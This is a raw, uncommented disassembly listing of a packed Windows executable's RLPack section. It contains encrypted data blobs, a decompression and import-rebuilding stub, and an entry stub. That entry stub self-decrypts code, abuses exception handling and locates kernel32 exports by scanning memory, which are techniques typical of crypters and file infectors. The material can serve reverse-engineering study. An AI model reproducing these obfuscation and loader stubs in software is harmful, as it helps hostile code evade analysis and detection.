dd 0C38B4C80h, 551EDD38h, 2DC0C148h, 40547058h, 67F13804h
dd 0AA01880h, 0FE4C5301h, 14381500h, 3110AE74h, 40DC00D8h
dd 0C8010884h, 190BE273h, 80254905h, 0C202FD68h, 80630016h
dd 147E3138h, 5E24A708h, 400200Fh, 37A6410Bh, 70841C10h
dd 0E7308663h, 4A0F286Fh, 0C0AC1C0Eh, 0C3324CA4h, 0CCD1009Dh
dd 891B1E0Dh, 29006842h, 8320785Fh, 48AE9979h, 1075938h
dd 90E8F3F7h, 0BDC7384h, 57530900h, 0DA48856h, 815D0001h
dd 86134CEDh, 0B53E8D8Ch, 8B007043h, 0C083FC46h, 1CF02B04h
dd 0C0DEE5EDh, 76372056h, 3581C4Ch, 2FBD0062h, 0AD29321Fh
dd 7CB8ABh, 487B8390h, 26987401h, 44730E03h, 0B0E3F685h
dd 4D23B9h, 7B1DA783h, 0F3FA4740h, 797EA400h, 1111B58h
dd 6FC8002Fh, 1F06D304h, 0FF00CC61h, 2A511C1Eh, 1C9E46E8h
dd 40019053h, 892C4E8Bh, 4BE62B8Dh, 19406A00h, 7B2451C7h
dd 37611F95h, 27854021h, 0E8560D84h, 0BF96F600h, 1DBD2072h
dd 0C0FC1Ch, 0C194DB0Fh, 0CA402822h, 0D1550C1Eh, 9AF66670h
dd 85340613h, 4E770AC9h, 8664F00h, 47204651h, 6EC00006h
dd 958B7B74h, 1A0054AAh, 0AE6C8DCDh, 75440Dh, 103A8AA9h
dd 63F72DEBh, 8057C100h, 8152E074h, 979E00E1h, 8D517F01h
dd 98000785h, 3F0E5031h, 58058A1Fh, 260EB989h, 3E00B1Dh
dd 8B41C8EDh, 3F3E5200h, 96A6C2D2h, 6A0D0081h, 0AB85108Ah
dd 0C000211Ch, 431489Ah, 54EB08h, 0DE37500Ch, 75102591h
dd 36432C00h, 80404B0Bh, 0F7030B0Eh, 0DE0006C6h, 3E1CC183h
dd 1489D200h, 0C246250Bh, 0B37790h, 0A3D607F2h, 4837E357h
dd 0A200197Ch, 0CE0F44B5h, 98D13BA6h, 30C0004h, 5F5E5DC7h
dd 0C3005B2Ch, 0FCC44215h, 3DE8BB49h, 818720C2h, 0E16806EBh
dd 0E339E03Fh, 51CB8A00h, 0A92293FFh, 0E97749h, 7E6A60BAh
dd 0C9D3C3A1h, 4D00ED98h, 3F7402D8h, 7E755216h, 504C00FAh
dd 339386E2h, 0AB000145h, 4C2835Ah, 7E61E4EBh, 6AC0007h
dd 68AFC575h, 83001EC9h, 0A2D70123h, 90CD8AD0h, 0C26600DDh
dd 9EE91008h, 0BD0F24ADh, 74033F07h, 0F4A940C9h, 0C993207h
dd 49D235h, 5C100F2Fh, 3ED40016h, 58C94C72h, 741D3C0Bh
dd 0FE40110Ah, 24503020h, 2E0701EBh, 0F85589E0h, 46B7F80Fh
dd 0A91039h, 0EE7D7564h, 4C8A08h, 0AB849087h, 926C587Ah
dd 40FC3100h, 36F0125Eh, 75E203h, 7DCF3BF8h, 4606C934h
dd 0D0B07000h, 0FC550107h, 0B3E80E2Ch, 0FE8074D3h, 0D7188AC8h
dd 2A1C7500h, 0DECC23Ah, 0C166000Eh, 0C06108E8h, 0C4008610h
dd 5F061E34h, 800701h, 5C3F04C6h, 0C8EB41C1h, 24595E02h
dd 600D46BEh, 3B3586h, 6230D52Ah, 16F784ABh, 1F005377h
dd 0BCFD78E9h, 170D5Ah, 39428E51h, 833440F8h, 23FEC00h
dd 12768B66h, 0A9B852h, 5906FEA7h, 491C2C8Eh, 57133F00h
dd 0D0B3E651h, 41AC00E5h, 0EFF71747h, 0B90027A9h, 0CD42DE50h
dd 78ED8B43h, 4D740010h, 8673E0C9h, 28007D5Eh, 0F8084B2Ch
dd 42C19Ch, 0A5F302F9h, 0E1832DC0h, 0FF64FB00h, 1604507Bh
dd 0A4CF00FAh, 19D16A52h, 1000AB1Fh, 5AAA84CAh, 0E3B7BB4h
dd 343D32DAh, 0C3A68161h, 0FF5A7101h, 55E38890h, 809C2200h
dd 0C102479Ah, 51F0010Eh, 91235652h, 0D08AC972h, 890050D6h
dd 2EBFA6BBh, 26EC7Dh, 48076E35h, 3685C82Bh, 80B22A3Dh
dd 315F205Eh, 3047Ch
dd 0BB515D2Ch, 0E48D098h, 0B252F401h, 5C087D4Bh, 86A8D0h
dd 6FC72F8Bh, 6D91E51h, 0D000EC73h, 7140C8F8h, 0B59274h
dd 12D446DDh, 9F154129h, 0FB8F3600h, 0EBC2066Eh, 6B5A16CAh
dd 0FA54001Bh, 758C7D3Bh, 28F90E1Fh, 0F3DA11C0h, 0C14027h
dd 0FFF05C7h, 1C10AAA4h, 0E0DC0C00h, 9C752BDFh, 3849002Eh
dd 0DA93F35Eh, 0D5980B91h, 2DED080Eh, 0B3805D24h, 1A3FDCBh
dd 1F14EA5Fh, 8776B49Bh, 80399382h, 0D75B65Ch, 8074063Dh
dd 0A2CF0803h, 1516043h, 34F50C4Eh, 30197ECEh, 2100FF7Fh
dd 5750E87Bh, 0EC535109h, 2DEA001Fh, 23481B41h, 0E1007788h
dd 2714A920h, 3938C5EBh, 39006D73h, 99756276h, 0C70070E4h
dd 0C45881Ah, 838925h, 90D0B1ADh, 0F687AE10h, 8B114601h
dd 4E2CEF93h, 1AF1CC4h, 8327D2D6h, 6059C8E9h, 303FB830h
dd 0EB689C73h, 104463C2h, 1920608Eh, 7DCE00C9h, 1455B140h
dd 0D2787A85h, 0D6760200h, 0F20DF662h, 6EA800C7h, 0B09F4F8Ah
dd 440074B8h, 4E7FA452h, 722521A9h, 23390009h, 0EB166A38h
dd 0F400810Eh, 0D6744103h, 0E0F366h, 2CE34051h, 9A1FC849h
dd 61685A01h, 4DAC6F6Ch, 325F870h, 22548B02h, 88D8EBBBh
dd 0D5009C9Dh, 0FC5184AEh, 6F5E15h, 2A01F3D7h, 89F12B30h
dd 0E8D0B403h, 901C12A4h, 900C4D3Bh, 1390E8h, 9836BEF3h
dd 6DFC496Bh, 1ACAD200h, 571C2084h, 40B60781h, 2EB9483Ch
dd 7C8D1400h, 83001801h, 0CFF427C7h, 0BE9C12Ch, 0CCE11C60h
dd 50769100h, 0C97B4BB6h, 1EFB3A03h, 0D8078A80h, 4F6A8h
dd 88782C74h, 141D5951h, 1E39E700h, 6590A563h, 2B8503B2h
dd 7A660D29h, 0A7E422B0h, 0A40C3207h, 0FED03325h, 10AF97h
dd 724A9ACFh, 8DB2807Bh, 8068B83Ah, 5DEAB2Dh, 34568Bh
dd 0A66F1789h, 0F1AE484Ch, 0C4704100h, 631D696Ch, 1740061h
dd 65206E6Fh, 0B703C772h, 0E712143Eh, 75C5D07Dh, 2EDB00FFh
dd 65685480h, 3B00E3FBh, 643F633Ch, 14C6F6h, 0F2357325h
dd 6EE5F96Ch, 0F574D900h, 0BBAF0762h, 367F3D61h, 0F8646980h
dd 0E34C4453h, 3547A107h, 1BB28233h, 7F48B2Ch, 0CEA02B79h
dd 7157092Ah, 4B630027h, 758A48CDh, 0E1C9B73h, 4DC03233h
dd 619E3CDEh, 42C30067h, 8341786Fh, 183BDD77h, 6674808Fh
dd 386B14CDh, 6C9B07E3h, 0D7453F02h, 9350E069h, 4C7C70A4h
dd 68C04300h, 6E611E48h, 3F3F7C64h, 78834F3Dh, 477F18ACh
dd 50D7C2C4h, 1CA69E80h, 561F7CC1h, 0FE007269h, 341A08Dh
dd 0D463008Eh, 768A9A9Bh, 9EA9993h, 8012823Eh, 0A37DAB25h
dd 0F33010Eh, 22D3396Dh, 5044EBE0h, 4800893Ch, 9A7A304Ch
dd 0FC9C6349h, 421903A5h, 0B6BB0181h, 318B6081h, 7CA3C730h
dd 0B2FC28A0h, 0DB338000h, 0E802B3A4h, 0F1FBC6Dh, 0C98FF673h
dd 1E09642Ah, 50C05E1Ch, 36238C5Bh, 10B03E41h, 12194F31h
dd 75F7F8C0h, 0EBAA3F0Fh, 1D4DCCD4h, 0C8CB7C2Bh, 0EB83422Eh
dd 0CDD1AC28h, 0C9139207h, 48911C90h, 8E03FC1h, 2D2C677Dh
dd 7D7D063Dh, 0FC800A0Eh, 8306A005h, 0DC777FF8h, 8B95408Ch
dd 5601B3C5h, 2B00F7EAh, 5EA4F3F0h, 1028EEBh, 8A0575D2h
dd 0DD124616h, 41EA85C3h, 0A7F1EEE8h, 0E7B086BBh, 0C3F2720Fh
dd 899A2B54h, 611C08C1h, 99B80CC2h, 6802041Ch, 101663B2h
dd 8190964h, 18180CEAh, 1C2FC278h, 2A40D091h, 21145022h
dd 0C8FB41B8h, 88198DF0h, 8924129Eh, 5E3001EDh, 5047424h
dd 2C60C52h, 5FDC0E9h, 8914CA2Bh, 9D1FC4Ah, 78B8C3h, 8F6412E0h
dd 8353A005h, 550400C4h, 56575153h, 98758D52h, 8F8B67CFh
dd 0E8165D18h, 0A168610Dh, 7A73FFC0h, 4BF9E104h, 0EACA03E8h
dd 7AD0F801h, 50F8335Ah, 43D83338h, 0C27B0320h, 4B89081Dh
dd 331C14F2h, 4CF20E32h, 228D060Ch, 0FF945060h, 0F9585AD1h
dd 5CB208E9h, 0DB5BF05Ah, 8568986h, 1E4EEC45h, 0D7D7FF14h
dd 0D1A71B85h, 9B4B363Eh, 206BEB5Ah, 0CEC580D4h, 7180FF57h
dd 0F5E5AC6h, 5D5B595Fh, 114E04Eh, 80EDFFh, 0
; ---------------------------------------------------------------------------
pusha
call $+5
mov ebp, [esp]
add esp, 4
cmp dword ptr [esp+28h], 1
jnz short loc_42DC2B
mov eax, [esp+24h]
mov [ebp+592h], eax
jmp short loc_42DC37
; ---------------------------------------------------------------------------
loc_42DC2B: ; CODE XREF: .RLPack:0042DC1D�j
mov eax, [ebp+58Eh]
mov [ebp+592h], eax
loc_42DC37: ; CODE XREF: .RLPack:0042DC29�j
lea esi, [ebp+5BAh]
lea ebx, [ebp+441h]
xor edi, edi
call sub_42DD82
jmp short loc_42DC67
; ---------------------------------------------------------------------------
loc_42DC4C: ; CODE XREF: .RLPack:0042DC6B�j
mov eax, [ebp+592h]
push dword ptr [edi+esi+4]
add [esp], eax
push dword ptr [edi+esi]
add [esp], eax
call ebx
add esp, 8
add edi, 8
loc_42DC67: ; CODE XREF: .RLPack:0042DC4A�j
cmp dword ptr [edi+esi], 0
jnz short loc_42DC4C
cmp dword ptr [ebp+59Eh], 0
jz short loc_42DC84
cmp dword ptr [ebp+5A2h], 0
jz short loc_42DC84
call sub_42DE5A
loc_42DC84: ; CODE XREF: .RLPack:0042DC74�j
; .RLPack:0042DC7D�j
lea esi, [edi+esi+4]
push ebx
push 40h
push 1000h
push 0B5h
push 0
call dword ptr [ebp+527h]
mov [ebp+5B6h], eax
pop ebx
push dword ptr [ebp+5B6h]
push esi
call ebx
add esp, 8
mov esi, [ebp+5B6h]
mov eax, esi
jmp short loc_42DCBB
; ---------------------------------------------------------------------------
loc_42DCBA: ; CODE XREF: .RLPack:0042DCBE�j
inc eax
loc_42DCBB: ; CODE XREF: .RLPack:0042DCB8�j
cmp byte ptr [eax], 1
jnz short loc_42DCBA
inc eax
mov edi, [eax]
add edi, [ebp+592h]
add eax, 4
mov [ebp+5B2h], eax
jmp short loc_42DD42
; ---------------------------------------------------------------------------
loc_42DCD4: ; CODE XREF: .RLPack:0042DD45�j
push esi
call dword ptr [ebp+51Fh]
or eax, eax
jnz short loc_42DCE4
call sub_42DFAD
loc_42DCE4: ; CODE XREF: .RLPack:0042DCDD�j
test eax, eax
jz loc_42DD80
mov [ebp+5AEh], eax
mov eax, esi
jmp short loc_42DD20
; ---------------------------------------------------------------------------
loc_42DCF6: ; CODE XREF: .RLPack:0042DD23�j
mov eax, [ebp+5B2h]
mov eax, [eax]
push eax
push dword ptr [ebp+5AEh]
call sub_42DF1B
test eax, eax
jz short loc_42DD80
mov [edi], eax
add dword ptr [ebp+5B2h], 4
add edi, 4
mov eax, [ebp+5B2h]
loc_42DD20: ; CODE XREF: .RLPack:0042DCF4�j
cmp dword ptr [eax], 0
jnz short loc_42DCF6
jmp short loc_42DD28
; ---------------------------------------------------------------------------
loc_42DD27: ; CODE XREF: .RLPack:0042DD2B�j
inc esi
loc_42DD28: ; CODE XREF: .RLPack:0042DD25�j
cmp byte ptr [esi], 0
jnz short loc_42DD27
inc esi
add eax, 4
mov edi, [eax]
add edi, [ebp+592h]
add eax, 4
mov [ebp+5B2h], eax
loc_42DD42: ; CODE XREF: .RLPack:0042DCD2�j
cmp byte ptr [esi], 1
jnz short loc_42DCD4
push 4000h
push 0B5h
push dword ptr [ebp+5B6h]
call dword ptr [ebp+52Bh]
push 8000h
push 0
push dword ptr [ebp+5B6h]
call dword ptr [ebp+52Bh]
call sub_42DDD6
call sub_42DED6
popa
jmp sub_401000
; ---------------------------------------------------------------------------
loc_42DD80: ; CODE XREF: .RLPack:0042DCE6�j
; .RLPack:0042DD0C�j
popa
retn
; =============== S U B R O U T I N E =======================================
sub_42DD82 proc near ; CODE XREF: .RLPack:0042DC45�p
pusha
lea eax, [ebp+58Ah]
push eax
push 40h
push 200h
push dword ptr [ebp+592h]
call dword ptr [ebp+52Fh]
mov dword ptr [ebp+58Ah], 2040001h
mov eax, [ebp+592h]
add eax, [eax+3Ch]
add ax, [eax+14h]
add eax, 18h
mov ebx, [eax+0Ch]
add ebx, [ebp+592h]
mov ecx, [eax+8]
lea eax, [ebp+58Ah]
push eax
push 40h
push ecx
push ebx
call dword ptr [ebp+52Fh]
popa
retn
sub_42DD82 endp
; =============== S U B R O U T I N E =======================================
sub_42DDD6 proc near ; CODE XREF: .RLPack:0042DD70�p
var_24 = dword ptr -24h
pusha
mov esi, [ebp+596h]
or esi, esi
jz short loc_42DE58
mov edi, [ebp+58Eh]
mov eax, [ebp+592h]
cmp eax, edi
jz short loc_42DE58
add esi, eax
jmp short loc_42DE53
; ---------------------------------------------------------------------------
loc_42DDF5: ; CODE XREF: sub_42DDD6+80�j
mov edx, [esi]
mov eax, [esi+4]
mov [ebp+59Ah], eax
add [ebp+59Ah], esi
mov ebx, [ebp+592h]
xor ecx, ecx
add esi, 8
jmp short loc_42DE4B
; ---------------------------------------------------------------------------
loc_42DE13: ; CODE XREF: sub_42DDD6+7B�j
movzx eax, byte ptr [esi]
cmp al, 0E0h
jnb short loc_42DE2E
push eax
add eax, edx
add eax, ebx
add eax, ecx
add ecx, [esp+24h+var_24]
add esp, 4
sub [eax], edi
add [eax], ebx
inc esi
jmp short loc_42DE4B
; ---------------------------------------------------------------------------
loc_42DE2E: ; CODE XREF: sub_42DDD6+42�j
movzx eax, word ptr [esi]
xchg al, ah
sub ax, 0E000h
push eax
add eax, edx
add eax, ebx
add eax, ecx
add ecx, [esp+24h+var_24]
add esp, 4
sub [eax], edi
add [eax], ebx
add esi, 2
loc_42DE4B: ; CODE XREF: sub_42DDD6+3B�j
; sub_42DDD6+56�j
cmp esi, [ebp+59Ah]
jb short loc_42DE13
loc_42DE53: ; CODE XREF: sub_42DDD6+1D�j
cmp dword ptr [esi], 0
jnz short loc_42DDF5
loc_42DE58: ; CODE XREF: sub_42DDD6+9�j
; sub_42DDD6+19�j
popa
retn
sub_42DDD6 endp
; =============== S U B R O U T I N E =======================================
sub_42DE5A proc near ; CODE XREF: .RLPack:0042DC7F�p
pusha
mov esi, [ebp+59Eh]
add esi, [ebp+592h]
mov edi, esi
mov ecx, [ebp+5A2h]
cmp dword ptr [ebp+5A6h], 0
jz short loc_42DEAC
jmp short loc_42DEA5
; ---------------------------------------------------------------------------
loc_42DE7A: ; CODE XREF: sub_42DE5A+4E�j
cmp byte ptr [esi], 0E8h
jz short loc_42DE84
cmp byte ptr [esi], 0E9h
jnz short loc_42DEA3
loc_42DE84: ; CODE XREF: sub_42DE5A+23�j
mov eax, [esi+1]
cmp al, [ebp+5A6h]
jnz short loc_42DE9D
mov al, 0
bswap eax
sub eax, 5
add eax, edi
sub eax, esi
mov [esi+1], eax
loc_42DE9D: ; CODE XREF: sub_42DE5A+33�j
add esi, 4
sub ecx, 4
loc_42DEA3: ; CODE XREF: sub_42DE5A+28�j
inc esi
dec ecx
loc_42DEA5: ; CODE XREF: sub_42DE5A+1E�j
cmp ecx, 0
ja short loc_42DE7A
jmp short loc_42DED4
; ---------------------------------------------------------------------------
loc_42DEAC: ; CODE XREF: sub_42DE5A+1C�j
cdq
jmp short loc_42DECF
; ---------------------------------------------------------------------------
loc_42DEAF: ; CODE XREF: sub_42DE5A+78�j
inc edx
cmp byte ptr [esi], 0E8h
jz short loc_42DEBA
cmp byte ptr [esi], 0E9h
jnz short loc_42DECD
loc_42DEBA: ; CODE XREF: sub_42DE5A+59�j
mov eax, [esi+1]
bswap eax
sub eax, edx
mov [esi+1], eax
add esi, 4
add edx, 4
sub ecx, 4
loc_42DECD: ; CODE XREF: sub_42DE5A+5E�j
inc esi
dec ecx
loc_42DECF: ; CODE XREF: sub_42DE5A+53�j
cmp ecx, 0
ja short loc_42DEAF
loc_42DED4: ; CODE XREF: sub_42DE5A+50�j
popa
retn
sub_42DE5A endp
; =============== S U B R O U T I N E =======================================
sub_42DED6 proc near ; CODE XREF: .RLPack:0042DD75�p
pusha
mov esi, [ebp+592h]
add esi, [esi+3Ch]
mov esi, [esi+0C0h]
or esi, esi
jz short loc_42DF19
add esi, [ebp+592h]
add esi, 0Ch
mov esi, [esi]
or esi, esi
jz short loc_42DF19
mov eax, [esi]
jmp short loc_42DF15
; ---------------------------------------------------------------------------
loc_42DEFD: ; CODE XREF: sub_42DED6+41�j
push esi
cmp dword ptr [eax], 0
jz short loc_42DF0F
push 0
push 1
push dword ptr [ebp+592h]
call eax
loc_42DF0F: ; CODE XREF: sub_42DED6+2B�j
pop esi
add esi, 4
mov eax, [esi]
loc_42DF15: ; CODE XREF: sub_42DED6+25�j
or eax, eax
jnz short loc_42DEFD
loc_42DF19: ; CODE XREF: sub_42DED6+12�j
; sub_42DED6+21�j
popa
retn
sub_42DED6 endp
; =============== S U B R O U T I N E =======================================
sub_42DF1B proc near ; CODE XREF: .RLPack:0042DD05�p
; sub_42DFAD+14�p
var_4 = dword ptr -4
arg_0 = byte ptr 4
lea eax, [esp+arg_0]
pusha
mov esi, eax
mov eax, [esi+4]
rol eax, 8
cmp al, 80h
jnz short loc_42DF4A
ror eax, 8
xor eax, 80000000h
cmp eax, 10000h
jbe short loc_42DF57
xor eax, 80000000h
push eax
push dword ptr [esi]
call sub_42DF68
jmp short loc_42DF57
; ---------------------------------------------------------------------------
loc_42DF4A: ; CODE XREF: sub_42DF1B+F�j
ror eax, 8
push dword ptr [esi+4]
push dword ptr [esi]
call sub_42DF68
loc_42DF57: ; CODE XREF: sub_42DF1B+1E�j
; sub_42DF1B+2D�j
push eax
push dword ptr [esi]
call dword ptr [ebp+523h]
mov [esp+20h+var_4], eax
popa
retn 8
sub_42DF1B endp
; =============== S U B R O U T I N E =======================================
sub_42DF68 proc near ; CODE XREF: sub_42DF1B+28�p
; sub_42DF1B+37�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebx, [esp+20h+arg_0]
mov ecx, ebx
add ebx, [ebx+3Ch]
mov ebx, [ebx+78h]
add ebx, ecx
mov edi, [ebx+20h]
add edi, ecx
xor esi, esi
loc_42DF7E: ; CODE XREF: sub_42DF68+34�j
lea edx, [edi+esi*4]
mov edx, [edx]
add edx, ecx
xor eax, eax
loc_42DF87: ; CODE XREF: sub_42DF68+28�j
rol eax, 7
xor al, [edx]
inc edx
cmp byte ptr [edx], 0
jnz short loc_42DF87
cmp eax, [esp+20h+arg_4]
jz short loc_42DF9E
inc esi
cmp esi, [ebx+18h]
jb short loc_42DF7E
loc_42DF9E: ; CODE XREF: sub_42DF68+2E�j
lea edx, [edi+esi*4]
mov edx, [edx]
add edx, ecx
mov [esp+20h+var_4], edx
popa
retn 8
sub_42DF68 endp
; =============== S U B R O U T I N E =======================================
sub_42DFAD proc near ; CODE XREF: .RLPack:0042DCDF�p
arg_4 = dword ptr 8
pusha
lea eax, [ebp+512h]
push eax
call dword ptr [ebp+51Fh]
push 774393E8h
push eax
call sub_42DF1B
mov edi, eax
push 40h
push 1000h
push 104h
push 0
call dword ptr [ebp+527h]
mov [ebp+5AAh], eax
push 104h
push dword ptr [ebp+5AAh]
cmp dword ptr [ebp+592h], 0
jz short loc_42DFFE
push dword ptr [ebp+592h]
jmp short loc_42E004
; ---------------------------------------------------------------------------
loc_42DFFE: ; CODE XREF: sub_42DFAD+47�j
push dword ptr [ebp+58Eh]
loc_42E004: ; CODE XREF: sub_42DFAD+4F�j
call edi
mov eax, [ebp+5AAh]
jmp short loc_42E00F
; ---------------------------------------------------------------------------
loc_42E00E: ; CODE XREF: sub_42DFAD+65�j
inc eax
loc_42E00F: ; CODE XREF: sub_42DFAD+5F�j
cmp byte ptr [eax], 0
jnz short loc_42E00E
jmp short loc_42E01A
; ---------------------------------------------------------------------------
loc_42E016: ; CODE XREF: sub_42DFAD+70�j
mov byte ptr [eax], 0
dec eax
loc_42E01A: ; CODE XREF: sub_42DFAD+67�j
cmp byte ptr [eax], 5Ch
jnz short loc_42E016
inc eax
jmp short loc_42E029
; ---------------------------------------------------------------------------
loc_42E022: ; CODE XREF: sub_42DFAD+7F�j
movzx ebx, byte ptr [esi]
mov [eax], bl
inc esi
inc eax
loc_42E029: ; CODE XREF: sub_42DFAD+73�j
cmp byte ptr [esi], 0
jnz short loc_42E022
push dword ptr [ebp+5AAh]
call dword ptr [ebp+51Fh]
mov [esp+14h+arg_4], eax
push 8000h
push 0
push dword ptr [ebp+5AAh]
call dword ptr [ebp+52Bh]
popa
retn
sub_42DFAD endp
; ---------------------------------------------------------------------------
pusha
mov esi, [esp+24h]
mov edi, [esp+28h]
cld
mov dl, 80h
xor ebx, ebx
loc_42E061: ; CODE XREF: .RLPack:0042E069�j
movsb
mov bl, 2
loc_42E064: ; CODE XREF: .RLPack:0042E08E�j
; .RLPack:0042E0D4�j
call sub_42E0D6
jnb short loc_42E061
xor ecx, ecx
call sub_42E0D6
jnb short loc_42E090
xor eax, eax
call sub_42E0D6
jnb short loc_42E0A0
mov bl, 2
inc ecx
mov al, 10h
loc_42E082: ; CODE XREF: .RLPack:0042E089�j
call sub_42E0D6
adc al, al
jnb short loc_42E082
jnz short loc_42E0CC
stosb
jmp short loc_42E064
; ---------------------------------------------------------------------------
loc_42E090: ; CODE XREF: .RLPack:0042E072�j
call sub_42E0E2
sub ecx, ebx
jnz short loc_42E0A9
call sub_42E0E0
jmp short loc_42E0C8
; ---------------------------------------------------------------------------
loc_42E0A0: ; CODE XREF: .RLPack:0042E07B�j
lodsb
shr eax, 1
jz short loc_42E0F2
adc ecx, ecx
jmp short loc_42E0C5
; ---------------------------------------------------------------------------
loc_42E0A9: ; CODE XREF: .RLPack:0042E097�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call sub_42E0E0
cmp eax, 7D00h
jnb short loc_42E0C5
cmp ah, 5
jnb short loc_42E0C6
cmp eax, 7Fh
ja short loc_42E0C7
loc_42E0C5: ; CODE XREF: .RLPack:0042E0A7�j
; .RLPack:0042E0B9�j
inc ecx
loc_42E0C6: ; CODE XREF: .RLPack:0042E0BE�j
inc ecx
loc_42E0C7: ; CODE XREF: .RLPack:0042E0C3�j
xchg eax, ebp
loc_42E0C8: ; CODE XREF: .RLPack:0042E09E�j
mov eax, ebp
mov bl, 1
loc_42E0CC: ; CODE XREF: .RLPack:0042E08B�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_42E064
; =============== S U B R O U T I N E =======================================
sub_42E0D6 proc near ; CODE XREF: .RLPack:loc_42E064�p
; .RLPack:0042E06D�p ...
add dl, dl
jnz short locret_42E0DF
mov dl, [esi]
inc esi
adc dl, dl
locret_42E0DF: ; CODE XREF: sub_42E0D6+2�j
retn
sub_42E0D6 endp
; =============== S U B R O U T I N E =======================================
sub_42E0E0 proc near ; CODE XREF: .RLPack:0042E099�p
; .RLPack:0042E0AF�p
xor ecx, ecx
sub_42E0E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E0E2 proc near ; CODE XREF: .RLPack:loc_42E090�p
inc ecx
loc_42E0E3: ; CODE XREF: sub_42E0E2+D�j
call sub_42E0D6
adc ecx, ecx
call sub_42E0D6
jb short loc_42E0E3
retn
sub_42E0E2 endp
; ---------------------------------------------------------------------------
loc_42E0F2: ; CODE XREF: .RLPack:0042E0A3�j
sub edi, [esp+28h]
mov [esp+1Ch], edi
popa
retn
; ---------------------------------------------------------------------------
dd 3 dup(0)
dd 2E124h, 2E131h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh
db 0
dword_42E131 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA db 0A0h, 0ADh, 80h
dd 809A517Ch, 809AE47Ch, 801AD07Ch, 7Ch, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 74654700h, 636F7250h, 72646441h
dd 737365h, 72695600h, 6C617574h, 6F6C6C41h, 56000063h
dd 75747269h, 72466C61h, 6565h, 74726956h, 506C6175h, 65746F72h
dd 7463h, 1000h, 8, 20h, 2 dup(400000h), 2 dup(0)
dd 1000h, 9E00h, 9, 0
dd 77120000h, 3300B9h, 330000h, 22000h, 1000h, 2CE28h
dd 20000h, 0
; ---------------------------------------------------------------------------
imul ebx, ds:6CC16E72h, 33h
xor ch, [esi]
xlat byte ptr fs:[ebx]
mov bh, 0
dec ebp
push ebx
push esi
inc ebx
sub dl, [edx+54h]
or edi, [ebx+57h]
sub [edx], esi
pop edi
push ss
sahf
push ebp
retf 5245h
; ---------------------------------------------------------------------------
db 0Bh, 61h, 41h
dd 50CC5644h, 0E0DA649h, 4C454853h, 4FCF0C34h, 5541055Fh
dd 10D3154h, 0C002C110h, 0AC008026h, 0C0EAEEC8h, 36AFE1Fh
dd 705F697Ah, 3863A35h, 0E4312460h, 0A1FD3D37h, 4132C0Ch
dd 0C800E28h, 10503444h, 880CACD4h, 7D95823Ch, 4411F65Ah
dd 0BC89910h, 4C225742h, 80304DF7h, 0
db 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
push ebp
mov ebp, esp
call sub_42E282
call sub_42E309
push dword ptr fs:0
pop ebp
add ebp, 8
jmp loc_42E2C3
start endp
; =============== S U B R O U T I N E =======================================
sub_42E282 proc near ; CODE XREF: start+4�p
var_C = dword ptr -0Ch
push dword ptr fs:0
mov fs:0, esp
xor ecx, ecx
push ecx
push 80h
push 80000000h
push 80000000h
push ecx
push ecx
push 800h
push ecx
push 80000000h
push 80000000h
push 10000h
push 80000000h
push ecx
call ds:dword_42E131 ; LoadLibraryA
loc_42E2C3: ; CODE XREF: start+18�j
sub esi, esi
sub ecx, ecx
mov cl, 0CBh
loc_42E2C9: ; CODE XREF: sub_42E282+49�j
inc esi
dec ecx
jnz short loc_42E2C9
call sub_42E305
sub edx, 0FFFFFFBCh
xor ecx, ecx
or ecx, 243Ch
push edx
loc_42E2E1: ; CODE XREF: sub_42E282+6A�j
xchg al, [edx]
sub ax, si
mov [edx], al
inc edx
dec ecx
or ecx, ecx
jnz short loc_42E2E1
pop edx
mov esp, fs:0
pop dword ptr fs:0
leave
mov [esp+20h+var_C], edx
popa
jmp edx
sub_42E282 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_42E305 proc near ; CODE XREF: sub_42E282+4B�p
pop edx
push edx
retn
sub_42E305 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
sub_42E309 proc near ; CODE XREF: start+9�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_42E309 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_42E362
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_42E359
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_42E361
; ---------------------------------------------------------------------------
loc_42E359: ; CODE XREF: .RLPack:0042E34A�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_42E361: ; CODE XREF: .RLPack:0042E357�j
pop ebx
loc_42E362: ; CODE XREF: .RLPack:0042E333�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 710h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_42E389: ; CODE XREF: .RLPack:0042E3A5�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_42E39F
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_42E3A7
loc_42E39F: ; CODE XREF: .RLPack:0042E390�j
sub ebx, 100h
jnz short loc_42E389
loc_42E3A7: ; CODE XREF: .RLPack:0042E39D�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_42E3B5: ; CODE XREF: .RLPack:loc_42E3DC�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_42E3DC
cmp dword ptr [eax+3], 636F7250h
jnz short loc_42E3DC
cmp dword ptr [eax+7], 72646441h
jnz short loc_42E3DC
cmp dword ptr [eax+0Bh], 737365h
jz short loc_42E3E1
loc_42E3DC: ; CODE XREF: .RLPack:0042E3BF�j
; .RLPack:0042E3C8�j ...
loop loc_42E3B5
pop ecx
pop ebp
retn
